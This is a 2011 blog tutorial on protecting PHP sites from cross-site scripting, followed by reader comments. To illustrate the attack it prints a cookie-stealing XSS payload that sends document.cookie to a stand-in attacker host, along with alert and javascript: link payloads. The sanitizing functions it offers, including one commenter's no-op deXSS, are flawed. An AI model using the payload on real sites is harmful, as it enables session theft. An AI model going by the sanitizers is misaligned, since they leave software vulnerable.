I am a Web Developer based in Michigan and I specialize in User Interface Design and Development.  I create functional, aesthetic and user-friendly web applications that adhere to the latest web standards. 

I am currently available for new projects, so hire me!

 

How To Protect Your Site From XSS With PHP

June 8th 2011

Cross-Site Scripting (XSS) is a type of attack where a hacker attempts to inject client-side scripting into a webpage that others are able to view.  The attack could be as simple as an annoying alert window or as sophisticated as stealing a logged in user's credentials (commonly saved in browser cookies).  With a user's credentials, a hacker could gain access to sensitive parts of your website or web application.  In this simple guide, I'll show you a few ways to protect your website from XSS with PHP.

The Basics Of An XSS Attack with Example

If you allow user input on your site or application (like comments, forums, etc), you could be the target of an XSS attack.  The hacker's goal is to submit a comment, forum post, etc with JavaScript code inside and have it executed on the web page. Since these types of user input can immediately be displayed to other user's, the attack could be spread pretty quickly and even without your knowledge.  For an example, we'll use comments on my website:

Let's say some hacker comes along (his name is John) and submits a comment with <script>alert('XSS!');</script> in the body of the comment.  When John refreshes the page, he sees an alert message pop up that says "XSS!".  His attack worked!

All John does in this example is create an annoyance to users; he doesn't actually steal any information.  However, since that attack went through so easily, John may be thinking of other things he could do like stealing cookies!  In JavaScript, cookies are accessible from the document object (i.e. document.cookie).  John could easily send any cookies, of users that visit the page his comment is posted on, to his website by posting the following in the body of the comment form:

<script>document.write("<img src='http://johns-site.com/?cookies='"+document.cookie+"' style='display:none;' />");</script>

Why does that work? When your browser visits a webpage, it downloads any images.  If the SRC attribute of an image points to something like the above, your browser will execute it.  If John receives cookies that are used to validate a user login, he could use those cookies to gain access to, perhaps, an administrative control panel and do even more damage! Also notice that he set the display property of that element to "none", this makes it so users can't see the image.  John could post a valid comment about the article and execute that script without anyone knowing what he's doing!  The rule of thumb here is to NEVER TRUST USER INPUT!

How To Filter Out XSS Using PHP

PHP has a couple different functions you can use to filter user input, namely: htmlentities() and strip_tags(). 

The htmlentities() function translates all applicable characters to their html entity counterparts.  For example, using this function < would become &lt; and > would become &gt; (i.e. <script> would become &lt;script&gt;). This function is good for escaping data and might prevent some types of attack, but not all (thanks to IE6).  When using the htmlentities function, make sure the second argument is set to ENT_QUOTES, like this:

htmlentities("<script>alert('XSS!');</script>", ENT_QUOTES);

You could use PHP's strip_tags() function to remove any HTML tags, but even this still won't prevent all types of XSS attacks (thanks to hyperlink vulnerabilities - a hacker doesn't need to use the <script> tag in hyperlinks to get JavaScript to execute).  So what can you do? You can use PHP to search for "script" and replace it with scri<b></b>pt.  Cutting up the code like this will prevent it from executing while still displaying the output.  

The XSS_PROTECT Function

Let's create a PHP function that will filter out any data that may have XSS code inside of it:

/**
* Method: xss_protect
*    Purpose: Attempts to filter out code used for cross-site scripting attacks
*    @param $data - the string of data to filter
*    @param $strip_tags - true to use PHP's strip_tags function for added security
*    @param $allowed_tags - a list of tags that are allowed in the string of data
*    @return a fully encoded, escaped and (optionally) stripped string of data
*/
function xss_protect($data, $strip_tags = false, $allowed_tags = "") { 
    if($strip_tags) {
        $data = strip_tags($data, $allowed_tags . "<b>");
    }

    if(stripos($data, "script") !== false) { 
        $result = str_replace("script","scr<b></b>ipt", htmlentities($data, ENT_QUOTES)); 
    } else { 
        $result = htmlentities($data, ENT_QUOTES); 
    } 

    return $result;
}

You can send this function any type of user input and it will return the same input, but fully escaped and encoded.  This function first checks to see if the data contains the word "script" anywhere; if it doesn't, it just encodes/escapes the data and returns it.  If, however, the stripos function finds "script" somewhere, it encodes/escapes the data and replaces all findings of "script" with scr<b></b>ipt and then returns the modified result.  

There are a couple things to notice about this function; first, the stripos function is a way to check the existence of a substring within a string without regards to case (i.e. it will find "script", "sCrIpT" or "SCRIPT"); second, comparing the result of the stripos function to false with "!==", instead of "!=", is important since the stripos function can return a non-boolean value which evaluates to false (like 0 or "").  Using "!==" compares both the types and values while using "!=" compares just the values.  See the PHP documentation on the stripos function for more information. 

You can optionally specify whether you want the function to strip any HTML tags from the data string by setting the second parameter of the function to true.  The third parameter can then be used to specify which HTML tags are allowed in the data string (which becomes the second argument to PHP's strip_tags function).

Here are a comple of examples on how to use this function:

//returns fully encoded/escaped content from comment
$data = xss_protect($_POST['comment_data']); 

//outputs: &lt;scr<b></b>ipt&gt;alert('XSS!');&lt;/scr<b></b>ipt&gt;
echo xss_protect("<script>alert('XSS!');</script>"); 

//outputs: click here
echo xss_protect("<a href="javascript:alert(document.cookie);">click here</a>", true); 

Never Trust User Input

No solution is going to be perfect, but at least now you have a head start!  If you have ways of improving this function, let myself and everyone else know in the comments.  Thanks for reading!


Discussion


Eric Wilson
06/10/2011
Eric Wilson
"You could use PHP's strip_tags() function to remove any HTML tags, but even this still won't prevent all types of XSS attacks (thanks to hyperlink vulnerabilities - a hacker doesn't need to use the tag in hyperlinks to get JavaScript to execute). "

I am confused a hyperlink is just another tag (<a href=""></a>) that is tripped by the strip_tags() function. I sort of see your point if you are allowing the "a" tag within the strip_tags() function but once I have reached the point where I allow the user to do any html input I would place more faith in an html sanitizer such as HTMLPurifier or something.
Jason T. Stiles
06/10/2011
Jason T. Stiles
@eric wilson - for example, if you were taking a user's input (i.e. their website url) and placing it inside a HREF attribute of an <a> tag to output to other users; a malicious user could easily take advantage of that by inputting "javascript:alert('XSS!');" into the website url input field. In this case, the strip_tags() function wouldn't prevent the JavaScript code from executing once a user clicks on the link.

I haven't used HTMLPurifier myself, but I've seen other people recommending it. It looks like a great library for making sure your code is XSS free. However, be aware that HTMLPurifier isn't exactly a fast running solution. Taken from their FAQs page:

"HTML Purifier isn't exactly light or speedy; this is a tradeoff for the power and security the library affords. You can combat this by reading Speeding up HTML Purifier or using the standalone version." http://htmlpurifier.org/docs

If I were the one implementing their solution, I'd be using their standalone version and speeding that up as much as I can. You definitely don't want your application hanging... Just make sure you know the ins and outs of any solution you end up using.

Thanks for pointing this out though, it definitely needed clearing up.
Lumbendil
06/10/2011
Lumbendil
In case you haven't taken a look at it, you could use the PHP library for validation/sanitization:

http://www.php.net/manual/book.filter.php
Jacek Wysocki
06/13/2011
Jacek Wysocki
Hi Jason,

Don't reinvent the weel, try PHPIDS, it's really great XSS detection system. https://phpids.org/
Michael Strong
06/13/2011
Michael Strong
There's just something about stripping tags that I don't like when validating user input.

Obviously in some specific cases its necessary, but as a general validation function I don't think its right to include it.

For example, if I want to type "Underlined" and you strip my tags, it will just show as "Underlined" which is unexpected from a users POV. The correct output should be "&lt;u&gt;Underlined&lt;/u&gt;"

Also, I believe in some browsers alert(1); may work. Same with line breaks.

I don't see why htmlentities with ENT_QUOTES isn't enough?


This is a function I use on one of my sites to show text as the user typed it (including line-breaks).
function display_html($string, $nl2br=true) {
$string = htmlentities($string, ENT_QUOTES, "utf-8"); // Convert normal chars

if ($nl2br) {
$string = nl2br($string);
}

$string = stripslashes($string);
return $string;
}

If I wanted to all tags, I think the best method would be to create a new function to convert patterns back to html.
Michael Strong
06/13/2011
Michael Strong
Just a note:

My first example and first quote was wrapped in html "u" tags. That's the point I was trying to make.
Josh Adell
06/13/2011
Josh Adell
Trying to protect against XSS is a very difficult thing. If you want the user to be able to enter data that includes HTML and still strip out scripts, it's almost impossible to do with regex or simple string replacement. Here'a a page that shows code snippets for a ton of common XSS attack vectors: http://ha.ckers.org/xss.html

If you want to allow users to be able to enter HTML markup, the only route you can go is with HTMLPurifier http://htmlpurifier.org/(or a similar library) which attempts to turn the user input into standards compliant HTML before stripping out the bad. It gets pretty much every vector listed in the list above, but a large performance cost.

Thanks for drawing attention to this important topic!
woof
06/14/2011
woof
@Josh Adell - Thanks for your detailed explaination.
I've just felt safe with some functions like strip_tags or htmlentities. but due to your tips I'll think about it again.
Michael
10/04/2011
Michael
XSS are very important topic. Thanks for providing a quick protect function.
For my projects, I uses session, not cookies. Second, I'm always using encryption and token key for my forms. Third, using sanitize inputs is like htmlentities, etc like you wrote in this tutorial. Nice tutorial.
melo
06/18/2012
melo
And why you are not using htmlspecialchars? They can't prevent XSS attacks?
Iosif
09/21/2012
Iosif
You should consider using the function str_ireplace() instead of str_replace(), because can be or .
Alex
12/02/2012
Alex
If you dont intend using html input in your project, here is VERY basic and very efficient way:



You may include such punction into main file to control all POST requests.
Alex
12/02/2012
Alex


function deXSS() {
foreach ($_POST as $v)
{
htmlspecialchars($v);
}
return true;
}

deXSS();
Collins
02/19/2013
Collins
please where am i gonna place the Xss protect function?
kbjk
09/03/2013
kbjk
ihi
deepak
09/18/2013
deepak
please
deepak
09/18/2013
deepak
please
deepak
09/18/2013
deepak
please
deepak
09/18/2013
deepak
please
deepak
09/18/2013
deepak
please
deepak
09/18/2013
deepak
please
deepak
09/18/2013
deepak
please
deepak
09/18/2013
deepak
please ?????
deepak
09/18/2013
deepak
what is tis
?
deepak
09/18/2013
deepak
what is tis
?
deepak
09/18/2013
deepak
what is tis
?
kkkkkkkkkkkkkkk
04/02/2014
kkkkkkkkkkkkkkk
kkkkkkkkkkkkkkk
04/02/2014
kkkkkkkkkkkkkkk
kkkkkkkkkkkkkkk
04/02/2014
kkkkkkkkkkkkkkk
hjhjkhkhkh
kkkkkkkkkkkkkkk
04/02/2014
kkkkkkkkkkkkkkk
hjhjkhkhkh

Have something to say?